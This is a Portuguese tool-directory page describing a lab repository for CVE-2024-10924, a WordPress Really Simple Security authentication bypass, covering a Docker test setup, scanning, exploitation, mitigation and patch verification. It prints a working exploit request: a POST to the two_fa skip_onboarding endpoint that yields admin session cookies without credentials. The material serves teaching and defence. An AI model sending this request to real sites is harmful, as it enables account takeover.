Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-10924 — Demonstra exploração e mitigação de CVE-2024-10924, um bypass de autenticação no WordPress Really Simple Security, com exploit Python automatizado, etapas manuais no Burp Suite e verificação de patch. | Kitploit
Ferramentas/GitHubGitHub/bodoinon/cve-2024-10924
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubbodoinon/cve-2024-10924

CVE-2024-10924

Demonstra exploração e mitigação de CVE-2024-10924, um bypass de autenticação no WordPress Really Simple Security, com exploit Python automatizado, etapas manuais no Burp Suite e verificação de patch.

Ver Repositório
2há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-10924 - Bypass de Autenticação no Really Simple Security

VISÃO GERAL

Este projeto demonstra a exploração e mitigação do CVE-2024-10924, uma vulnerabilidade crítica de bypass de autenticação no plugin "Really Simple Security" do WordPress.

PASSO 1: CONFIGURAÇÃO DO AMBIENTE

Inicie o ambiente WordPress vulnerável: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d

Verifique se os contêineres estão em execução: docker ps

Acesse o WordPress: http://localhost:1337

Ferramentas necessárias:

  • Python 3.x (para exploit automatizado)
  • Burp Suite (para exploração manual)
  • GVM (Greenbone Vulnerability Management) para varredura

PASSO 2: VARREDURA DE VULNERABILIDADES

Execute a varredura GVM contra o alvo:

  • Target: http://localhost:1337
  • Resultado esperado: CVE-2024-10924 detectado
  • Gravidade: Crítica (CVSS 9.8)
  • Endpoint vulnerável: /reallysimplessl/v1/two_fa/skip_onboarding

PASSO 3: EXPLORAÇÃO

Método A - Exploit automatizado em Python: python exploit.py

Método B - Burp Suite manual:

  1. Intercepte o tráfego para http://localhost:1337

  2. Envie requisição POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json

    {"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}

  3. Observe a resposta com cabeçalho Set-Cookie contendo sessão de admin

Resultado esperado:

  • Status: 200 OK
  • Cookies de sessão de admin retornados
  • Bypass bem-sucedido sem credenciais

PASSO 4: MITIGAÇÃO

Aplique o patch para bloquear o endpoint vulnerável: .\patch.ps1

O que isso faz:

  • Copia mitigation.php para o diretório /wp-content/mu-plugins/ do contêiner
  • Bloqueia todas as requisições ao endpoint da API REST vulnerável
  • Retorna 403 Forbidden para tentativas de exploit

PASSO 5: VERIFICAÇÃO

Execute novamente o exploit (Método A ou B): python exploit.py

Resultado esperado após a mitigação:

  • Status: 403 Forbidden
  • Nenhum cookie de admin retornado
  • Ataque bloqueado com sucesso

NOTAS ADICIONAIS

Para parar o ambiente: docker-compose down

Para visualizar logs do contêiner: docker-compose logs -f

Para acessar o admin do WordPress legitimamente: http://localhost:1337/wp-admin (Verifique docker-compose.yml para credenciais)

Baixar ferramenta